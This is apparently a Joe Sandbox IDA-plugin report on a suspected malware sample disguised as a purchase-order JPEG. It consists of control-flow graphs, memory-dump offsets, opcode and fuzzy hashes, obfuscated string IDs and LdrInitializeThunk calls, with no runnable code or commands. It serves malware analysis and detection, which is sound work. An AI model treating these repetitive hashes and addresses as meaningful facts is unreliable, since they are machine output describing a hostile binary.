• Opcode ID: 1c1150b7a4935084c2a576d23582e83ca52fec15e7a0ac70ef10871a8fde6ed3
• Instruction ID: 9cfdec8271134270272768043f9ead073c8e28d456a9f04dbb11d133eb0f4a4e
• Opcode Fuzzy Hash: 1c1150b7a4935084c2a576d23582e83ca52fec15e7a0ac70ef10871a8fde6ed3
• Instruction Fuzzy Hash: 4EA1F675E10218DFDB18DFAAD884A9DBBF2BF89300F148069E518EB365DB709981CF50

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 437 122d278-122d284 438 122d286-122d2a8 437->438 439 122d2dd-122d38c call 12241a0 call 1223cc0 437->439 440 122d2aa 438->440 441 122d2af-122d2dc 438->441 451 122d393-122d3b4 call 1225658 439->451 452 122d38e 439->452 440->441 441->439 454 122d3b9-122d3c4 451->454 452->451 455 122d3c6 454->455 456 122d3cb-122d3cf 454->456 455->456 457 122d3d1-122d3d2 456->457 458 122d3d4-122d3db 456->458 459 122d3f3-122d437 457->459 460 122d3e2-122d3f0 458->460 461 122d3dd 458->461 465 122d49d-122d4b4 459->465 460->459 461->460 467 122d4b6-122d4db 465->467 468 122d439-122d44f 465->468 474 122d4f3 467->474 475 122d4dd-122d4f2 467->475 472 122d451-122d45d 468->472 473 122d479 468->473 476 122d467-122d46d 472->476 477 122d45f-122d465 472->477 478 122d47f-122d49c 473->478 475->474 479 122d477 476->479 477->479 478->465 479->478
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                        • API String ID: 0-1487592376
                                                                                                        • Opcode ID: 4a391e99b2c7fb608074a0dd5ac002d43266432502fcd188376d216a40d6f6c0
                                                                                                        • Instruction ID: a6b84e7cbf410f9a7e6c5c80ab104f6a61e493d2d69925b82e15a7b1adc83579
                                                                                                        • Opcode Fuzzy Hash: 4a391e99b2c7fb608074a0dd5ac002d43266432502fcd188376d216a40d6f6c0
                                                                                                        • Instruction Fuzzy Hash: DE81C574E11218DFDB14DFAAD884A9DBBF2FF49310F148069E518AB365DB74A981CF10

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 483 122ccd8-122cd08 484 122cd0a 483->484 485 122cd0f-122cdec call 12241a0 call 1223cc0 483->485 484->485 495 122cdf3-122ce14 call 1225658 485->495 496 122cdee 485->496 498 122ce19-122ce24 495->498 496->495 499 122ce26 498->499 500 122ce2b-122ce2f 498->500 499->500 501 122ce31-122ce32 500->501 502 122ce34-122ce3b 500->502 503 122ce53-122ce97 501->503 504 122ce42-122ce50 502->504 505 122ce3d 502->505 509 122cefd-122cf14 503->509 504->503 505->504 511 122cf16-122cf3b 509->511 512 122ce99-122ceaf 509->512 519 122cf53 511->519 520 122cf3d-122cf52 511->520 516 122ceb1-122cebd 512->516 517 122ced9 512->517 521 122cec7-122cecd 516->521 522 122cebf-122cec5 516->522 518 122cedf-122cefc 517->518 518->509 520->519 523 122ced7 521->523 522->523 523->518
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                        • API String ID: 0-1487592376
                                                                                                        • Opcode ID: 3d1d38b9b7f70ce149da0d0a9311058f1c99de6ed077f2eed7fb7e0cc22ea862
                                                                                                        • Instruction ID: fd0e94831e26dd0134514420c1b6ede20e3460d7f34c02c4966575e947bdcc5d
                                                                                                        • Opcode Fuzzy Hash: 3d1d38b9b7f70ce149da0d0a9311058f1c99de6ed077f2eed7fb7e0cc22ea862
                                                                                                        • Instruction Fuzzy Hash: 1981C274E10218DFDB18DFAAD984A9DBBF2BF88300F14C069E419AB365DB749981CF50

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 527 1225370-12253a0 528 12253a2 527->528 529 12253a7-1225484 call 12241a0 call 1223cc0 527->529 528->529 539 1225486 529->539 540 122548b-12254a9 529->540 539->540 570 12254ac call 1225658 540->570 571 12254ac call 1225649 540->571 541 12254b2-12254bd 542 12254c4-12254c8 541->542 543 12254bf 541->543 544 12254ca-12254cb 542->544 545 12254cd-12254d4 542->545 543->542 546 12254ec-1225530 544->546 547 12254d6 545->547 548 12254db-12254e9 545->548 552 1225596-12255ad 546->552 547->548 548->546 554 1225532-1225548 552->554 555 12255af-12255d4 552->555 559 1225572 554->559 560 122554a-1225556 554->560 561 12255d6-12255eb 555->561 562 12255ec 555->562 565 1225578-1225595 559->565 563 1225560-1225566 560->563 564 1225558-122555e 560->564 561->562 566 1225570 563->566 564->566 565->552 566->565 570->541 571->541
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                        • API String ID: 0-1487592376
                                                                                                        • Opcode ID: 383ff4641e74fef9fab4ea0c246a813d99a8c4d50745f73bd3fe949b0b852342
                                                                                                        • Instruction ID: 0044423c555a85e866b9619409617008dd952e50106285ed4bb9d5b596f4eaa4
                                                                                                        • Opcode Fuzzy Hash: 383ff4641e74fef9fab4ea0c246a813d99a8c4d50745f73bd3fe949b0b852342
                                                                                                        • Instruction Fuzzy Hash: A081A474E10218DFDB18DFAAD984A9DBBF2BF88300F14C069E419AB365DB749985CF50

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 572 122c468-122c471 573 122c473-122c491 572->573 574 122c498 572->574 573->574 575 122c49a 574->575 576 122c49f-122c57c call 12241a0 call 1223cc0 574->576 575->576 586 122c583-122c5a4 call 1225658 576->586 587 122c57e 576->587 589 122c5a9-122c5b4 586->589 587->586 590 122c5b6 589->590 591 122c5bb-122c5bf 589->591 590->591 592 122c5c1-122c5c2 591->592 593 122c5c4-122c5cb 591->593 594 122c5e3-122c627 592->594 595 122c5d2-122c5e0 593->595 596 122c5cd 593->596 600 122c68d-122c6a4 594->600 595->594 596->595 602 122c6a6-122c6cb 600->602 603 122c629-122c63f 600->603 609 122c6e3 602->609 610 122c6cd-122c6e2 602->610 607 122c641-122c64d 603->607 608 122c669 603->608 611 122c657-122c65d 607->611 612 122c64f-122c655 607->612 613 122c66f-122c68c 608->613 610->609 614 122c667 611->614 612->614 613->600 614->613
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                        • API String ID: 0-1487592376
                                                                                                        • Opcode ID: 06d1ec13275f94e60db054f534712c415878470c8347103bdcba2df19f3bae01
                                                                                                        • Instruction ID: d027c7c7cb6c30d47b4e72fb9a188855a046d11a177886fbf67e83e687395094
                                                                                                        • Opcode Fuzzy Hash: 06d1ec13275f94e60db054f534712c415878470c8347103bdcba2df19f3bae01
                                                                                                        • Instruction Fuzzy Hash: 0D81D674E10219DFDB18DFAAD984A9DBBF2BF88300F14D069E418AB365DB749981CF50

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 618 122ca08-122ca38 619 122ca3a 618->619 620 122ca3f-122cb1c call 12241a0 call 1223cc0 618->620 619->620 630 122cb23-122cb44 call 1225658 620->630 631 122cb1e 620->631 633 122cb49-122cb54 630->633 631->630 634 122cb56 633->634 635 122cb5b-122cb5f 633->635 634->635 636 122cb61-122cb62 635->636 637 122cb64-122cb6b 635->637 638 122cb83-122cbc7 636->638 639 122cb72-122cb80 637->639 640 122cb6d 637->640 644 122cc2d-122cc44 638->644 639->638 640->639 646 122cc46-122cc6b 644->646 647 122cbc9-122cbdf 644->647 653 122cc83 646->653 654 122cc6d-122cc82 646->654 651 122cbe1-122cbed 647->651 652 122cc09 647->652 655 122cbf7-122cbfd 651->655 656 122cbef-122cbf5 651->656 657 122cc0f-122cc2c 652->657 654->653 658 122cc07 655->658 656->658 657->644 658->657
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                        • API String ID: 0-1487592376
                                                                                                        • Opcode ID: fb2a6dbec04b2616240609fafd816fe0d06d254000897003110df0333512923c
                                                                                                        • Instruction ID: 543df177d560a10cb68945af4bb4ac72d6612cbca6e451652377d0365159e1ba
                                                                                                        • Opcode Fuzzy Hash: fb2a6dbec04b2616240609fafd816fe0d06d254000897003110df0333512923c
                                                                                                        • Instruction Fuzzy Hash: 8D81C374E10218DFDB18DFAAD884A9DBBF2BF88300F14C069E418AB365DB749981CF50

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 662 122c738-122c768 663 122c76a 662->663 664 122c76f-122c84c call 12241a0 call 1223cc0 662->664 663->664 674 122c853-122c874 call 1225658 664->674 675 122c84e 664->675 677 122c879-122c884 674->677 675->674 678 122c886 677->678 679 122c88b-122c88f 677->679 678->679 680 122c891-122c892 679->680 681 122c894-122c89b 679->681 682 122c8b3-122c8f7 680->682 683 122c8a2-122c8b0 681->683 684 122c89d 681->684 688 122c95d-122c974 682->688 683->682 684->683 690 122c976-122c99b 688->690 691 122c8f9-122c90f 688->691 697 122c9b3 690->697 698 122c99d-122c9b2 690->698 695 122c911-122c91d 691->695 696 122c939 691->696 699 122c927-122c92d 695->699 700 122c91f-122c925 695->700 701 122c93f-122c95c 696->701 698->697 702 122c937 699->702 700->702 701->688 702->701
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                        • API String ID: 0-1487592376
                                                                                                        • Opcode ID: f65bdfda61ce6b2da1799f8b2fc5a344f16a642cfce3bb7c05f4851638638193
                                                                                                        • Instruction ID: 6975aae458567d415cdc6be23dc2824dfaad9641f12f113c0b3b1f370d8f09ed
                                                                                                        • Opcode Fuzzy Hash: f65bdfda61ce6b2da1799f8b2fc5a344f16a642cfce3bb7c05f4851638638193
                                                                                                        • Instruction Fuzzy Hash: 7781D374E10218DFDB18DFAAD984A9DBBF2BF88310F14C069E418AB365DB749981CF51

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 706 122cfaa-122cfd8 707 122cfda 706->707 708 122cfdf-122d0bc call 12241a0 call 1223cc0 706->708 707->708 718 122d0c3-122d0e4 call 1225658 708->718 719 122d0be 708->719 721 122d0e9-122d0f4 718->721 719->718 722 122d0f6 721->722 723 122d0fb-122d0ff 721->723 722->723 724 122d101-122d102 723->724 725 122d104-122d10b 723->725 726 122d123-122d167 724->726 727 122d112-122d120 725->727 728 122d10d 725->728 732 122d1cd-122d1e4 726->732 727->726 728->727 734 122d1e6-122d20b 732->734 735 122d169-122d17f 732->735 741 122d223 734->741 742 122d20d-122d222 734->742 739 122d181-122d18d 735->739 740 122d1a9 735->740 743 122d197-122d19d 739->743 744 122d18f-122d195 739->744 745 122d1af-122d1cc 740->745 742->741 746 122d1a7 743->746 744->746 745->732 746->745
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                        • API String ID: 0-1487592376
                                                                                                        • Opcode ID: dcf12d28709d3ad99011a307b39622dee0bc8049a880aa3393cbf40be6f6c30b
                                                                                                        • Instruction ID: 79532250f7a1841a980db7b93cc83634164e45ae3ae29289980457dc97f90df4
                                                                                                        • Opcode Fuzzy Hash: dcf12d28709d3ad99011a307b39622dee0bc8049a880aa3393cbf40be6f6c30b
                                                                                                        • Instruction Fuzzy Hash: 9481C974E10218DFDB18DFAAD984A9DBBF2BF88310F14C069E419AB365DB749981CF10

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 750 12229ec-12229f6 752 1222981-122298a 750->752 753 12229f8-1222a01 750->753 754 1222990-1222999 752->754 753->754 755 1222a03-1222a3b 753->755 760 12229a0-12229c8 754->760 758 1222a5d-1222aac 755->758 759 1222a3d-1222a5c 755->759 765 1222ac7-1222acf 758->765 766 1222aae-1222ab5 758->766 769 1222ad2-1222ae6 765->769 767 1222ab7-1222abc 766->767 768 1222abe-1222ac5 766->768 767->769 768->769 772 1222ae8-1222aef 769->772 773 1222afc-1222b04 769->773 774 1222af1-1222af3 772->774 775 1222af5-1222afa 772->775 776 1222b06-1222b0a 773->776 774->776 775->776 778 1222b6a-1222b6d 776->778 779 1222b0c-1222b21 776->779 780 1222bb5-1222bbb 778->780 781 1222b6f-1222b84 778->781 779->778 787 1222b23-1222b26 779->787 782 1222bc1-1222bc3 780->782 783 12236b6 780->783 781->780 791 1222b86-1222b8a 781->791 782->783 785 1222bc9-1222bce 782->785 788 12236bb-1223700 783->788 789 1223664-1223668 785->789 790 1222bd4 785->790 792 1222b45-1222b63 call 12202c8 787->792 793 1222b28-1222b2a 787->793 810 1223702-1223728 788->810 811 122372e-1223874 788->811 795 122366a-122366d 789->795 796 122366f-12236b5 789->796 790->789 797 1222b92-1222bb0 call 12202c8 791->797 798 1222b8c-1222b90 791->798 792->778 793->792 799 1222b2c-1222b2f 793->799 795->788 795->796 797->780 798->780 798->797 799->778 800 1222b31-1222b43 799->800 800->778 800->792 810->811 813 12238a6-12238a9 811->813 814 1223876-1223878 811->814 815 12238aa-12238bc 813->815 814->815 818 122387a-12238a3 814->818 819 12238ee-12238f4 815->819 820 12238be-12238eb 815->820 818->813 822 12238f6-1223908 819->822 823 1223928-1223937 819->823 820->819 825 122393a-122393d 822->825 826 122390a-122390c 822->826 823->825 827 122393e-1223941 825->827 826->827 828 122390e-1223910 826->828 829 1223942-12239e8 827->829 828->829 830 1223912-1223927 828->830 830->823
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Xbq$Xbq$Xbq$Xbq
                                                                                                        • API String ID: 0-2732225958
                                                                                                        • Opcode ID: d8852315a067798ef15f6fe65c8dd647be73a1b60ded5c07cf9cd64690827275
                                                                                                        • Instruction ID: c4be666ff2d77ca48dd191b7f5fc0b5ded13c4377ae7c1da277114c885e0f502
                                                                                                        • Opcode Fuzzy Hash: d8852315a067798ef15f6fe65c8dd647be73a1b60ded5c07cf9cd64690827275
                                                                                                        • Instruction Fuzzy Hash: CF0224729287D19FC7638F38C4662AABF70EF4B214B184DDDC4C15E112E23A5892CB86

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 1463 6919328-6919338 1464 691933a 1463->1464 1465 691933f-691934b 1463->1465 1466 691946b-6919475 1464->1466 1468 6919352-6919367 1465->1468 1469 691934d 1465->1469 1472 691947b-69194bb 1468->1472 1473 691936d-6919378 1468->1473 1469->1466 1490 69194c2-6919577 1472->1490 1476 6919476 1473->1476 1477 691937e-6919385 1473->1477 1476->1472 1479 69193b2-69193bd 1477->1479 1480 6919387-691939e 1477->1480 1484 69193ca-69193d4 1479->1484 1485 69193bf-69193c7 1479->1485 1480->1490 1491 69193a4-69193a7 1480->1491 1492 69193da-69193e4 1484->1492 1493 691945e-6919463 1484->1493 1485->1484 1520 6919579 1490->1520 1521 691957e-6919614 LdrInitializeThunk 1490->1521 1491->1476 1495 69193ad-69193b0 1491->1495 1492->1476 1500 69193ea-6919406 1492->1500 1493->1466 1495->1479 1495->1480 1505 6919408 1500->1505 1506 691940a-691940d 1500->1506 1505->1466 1508 6919414-6919417 1506->1508 1509 691940f-6919412 1506->1509 1510 691941a-6919428 1508->1510 1509->1510 1510->1476 1513 691942a-6919431 1510->1513 1513->1466 1515 6919433-6919439 1513->1515 1515->1476 1516 691943b-6919440 1515->1516 1516->1476 1518 6919442-6919455 1516->1518 1518->1476 1523 6919457-691945a 1518->1523 1520->1521 1524 69196b3-69196b9 1521->1524 1523->1515 1525 691945c 1523->1525 1526 6919619-691962c 1524->1526 1527 69196bf-69196d7 1524->1527 1525->1466 1528 6919633-6919684 1526->1528 1529 691962e 1526->1529 1530 69196d9-69196e6 1527->1530 1531 69196eb-69196fe 1527->1531 1548 6919697-69196a9 1528->1548 1549 6919686-6919694 1528->1549 1529->1528 1534 6919a81-6919b7e 1530->1534 1532 6919700 1531->1532 1533 6919705-6919721 1531->1533 1532->1533 1536 6919723 1533->1536 1537 6919728-691974c 1533->1537 1539 6919b80-6919b85 1534->1539 1540 6919b86-6919b90 1534->1540 1536->1537 1544 6919753-6919785 1537->1544 1545 691974e 1537->1545 1539->1540 1553 6919787 1544->1553 1554 691978c-69197ce 1544->1554 1545->1544 1550 69196b0 1548->1550 1551 69196ab 1548->1551 1549->1527 1550->1524 1551->1550 1553->1554 1556 69197d0 1554->1556 1557 69197d5-69197de 1554->1557 1556->1557 1558 6919a06-6919a0c 1557->1558 1559 69197e3-6919808 1558->1559 1560 6919a12-6919a25 1558->1560 1561 691980a 1559->1561 1562 691980f-6919846 1559->1562 1563 6919a27 1560->1563 1564 6919a2c-6919a47 1560->1564 1561->1562 1572 6919848 1562->1572 1573 691984d-691987f 1562->1573 1563->1564 1565 6919a49 1564->1565 1566 6919a4e-6919a62 1564->1566 1565->1566 1570 6919a64 1566->1570 1571 6919a69-6919a7f LdrInitializeThunk 1566->1571 1570->1571 1571->1534 1572->1573 1575 6919881-69198a6 1573->1575 1576 69198e3-69198f6 1573->1576 1579 69198a8 1575->1579 1580 69198ad-69198db 1575->1580 1577 69198f8 1576->1577 1578 69198fd-6919922 1576->1578 1577->1578 1583 6919931-6919969 1578->1583 1584 6919924-6919925 1578->1584 1579->1580 1580->1576 1585 6919970-69199d1 call 6919328 1583->1585 1586 691996b 1583->1586 1584->1560 1592 69199d3 1585->1592 1593 69199d8-69199fc 1585->1593 1586->1585 1592->1593 1596 6919a03 1593->1596 1597 69199fe 1593->1597 1596->1558 1597->1596
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4147168772.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_6910000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: f41c237645b9a1ecf15303ec56cd29e0854c3b7a6c88fc01992b09c363be0169
                                                                                                        • Instruction ID: df72469d458439a752421da929ffda15f1332c9c82dbeafb19bb49c2615b3e1d
                                                                                                        • Opcode Fuzzy Hash: f41c237645b9a1ecf15303ec56cd29e0854c3b7a6c88fc01992b09c363be0169
                                                                                                        • Instruction Fuzzy Hash: 17224D70E00219CFDB54DFA9C994B9DBBB2BF88300F2485A9E419AB395DB349D85CF50
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (o^q$4'^q
                                                                                                        • API String ID: 0-273632683
                                                                                                        • Opcode ID: 31ea426e14f23154315e0fd44ff28c1ba43547ae959c4afc85b2dd18b4d3ce40
                                                                                                        • Instruction ID: d46597cd43f8b0d19ca652397ae21c91d8eac5e24060dac8f32fe9c092174fae
                                                                                                        • Opcode Fuzzy Hash: 31ea426e14f23154315e0fd44ff28c1ba43547ae959c4afc85b2dd18b4d3ce40
                                                                                                        • Instruction Fuzzy Hash: C9828E71A1021AEFCB15CFA8C984AAEBBF2FF88310F158955E5059BB62D770ED41CB50
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (o^q$Hbq
                                                                                                        • API String ID: 0-662517225
                                                                                                        • Opcode ID: fa3a982af64b8ae281cd527ec95f5f3d8f4abf73f5957ade2cb31cd8bfabce9e
                                                                                                        • Instruction ID: 5a68dd2273580ae439b6803716633f1dc9cb130a6d63c82510457cfaae9226c4
                                                                                                        • Opcode Fuzzy Hash: fa3a982af64b8ae281cd527ec95f5f3d8f4abf73f5957ade2cb31cd8bfabce9e
                                                                                                        • Instruction Fuzzy Hash: 4012AE71A102299FDB19DF69C894BAEBBF6BF88304F148529E9059B391DF309D41CB80
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Xbq$$^q
                                                                                                        • API String ID: 0-1593437937
                                                                                                        • Opcode ID: 4acfa29c775b89b8109a3d01e2346c727acd98586168d47407d8be997aa9b754
                                                                                                        • Instruction ID: 0a947da9045726c0d5f195a5eaf4bd06ec4cc11155612d6d691bf303434a4464
                                                                                                        • Opcode Fuzzy Hash: 4acfa29c775b89b8109a3d01e2346c727acd98586168d47407d8be997aa9b754
                                                                                                        • Instruction Fuzzy Hash: DD91C470B14259EBDB2CAF78C45527E7BB3BFC8700B148A2DE146E7298CE35C9468785
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4147168772.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_6910000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: e1e6b109ebe814d6d1a2de7f43ef5beebba1f8f52ebc90476206e6dbb4515308
                                                                                                        • Instruction ID: 3a69b0e73165f3dea91499a220b74fb7ebf9aac65f2bec9c3315634a991c6018
                                                                                                        • Opcode Fuzzy Hash: e1e6b109ebe814d6d1a2de7f43ef5beebba1f8f52ebc90476206e6dbb4515308
                                                                                                        • Instruction Fuzzy Hash: C331F8B1D016189BEB18CFAAD9847DDFBF6BF88314F24C12AE418A7294DB701945CF50
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f846b84f246f1693b6e9ac17a561a1b82c89b810f6b9df1db05a01b0e3529d6e
                                                                                                        • Instruction ID: 244100ff01a990d21f4d791e86e333f0fbf65de7710ce271622736e25e7d1b46
                                                                                                        • Opcode Fuzzy Hash: f846b84f246f1693b6e9ac17a561a1b82c89b810f6b9df1db05a01b0e3529d6e
                                                                                                        • Instruction Fuzzy Hash: 0D51C775E10218DFDB18DFAAD984A9DBBB2FF88310F24D029E815AB364DB359845CF10
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7077342df01d4fe9d09a6886af86d20cf6a5ef4c0c535b761afbe2d794b428db
                                                                                                        • Instruction ID: ffa96d78345a2a96a67839e8c93773af9c694ad5dba6212ebb57c1c48ab906ef
                                                                                                        • Opcode Fuzzy Hash: 7077342df01d4fe9d09a6886af86d20cf6a5ef4c0c535b761afbe2d794b428db
                                                                                                        • Instruction Fuzzy Hash: DB51B374E00318DFDB18DFAAD594A9DBBB2FF88300F209029E819AB364DB319945CF10
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                                                                                        • API String ID: 0-1932283790
                                                                                                        • Opcode ID: 08518751d03f1325da91cc4b6cab18a2f78cdd73019a22acb8a80b871656a222
                                                                                                        • Instruction ID: b6357a67aa96488439e7f4fe08d637b992f94ac4d7eea3411bb22df79add3f9b
                                                                                                        • Opcode Fuzzy Hash: 08518751d03f1325da91cc4b6cab18a2f78cdd73019a22acb8a80b871656a222
                                                                                                        • Instruction Fuzzy Hash: 46127A30A14219EFCB15CF68D984AAEBBF2FF98314F148569EA199B361D730ED41CB50
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $^q$$^q
                                                                                                        • API String ID: 0-355816377
                                                                                                        • Opcode ID: 3437fc430b8e3f6d15d2063c9889a314260055f4872886fbf0f211a55ff5af53
                                                                                                        • Instruction ID: d5e2dc5d258620a74881711a3f0b9b6d1f94bc948b4af373e10c850b25f8643d
                                                                                                        • Opcode Fuzzy Hash: 3437fc430b8e3f6d15d2063c9889a314260055f4872886fbf0f211a55ff5af53
                                                                                                        • Instruction Fuzzy Hash: AB526370A10219CFEB159BA4C890BAEBB77FF94300F1081A9D11A6B3A5CF359E85DF51
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Hbq$Hbq
                                                                                                        • API String ID: 0-4258043069
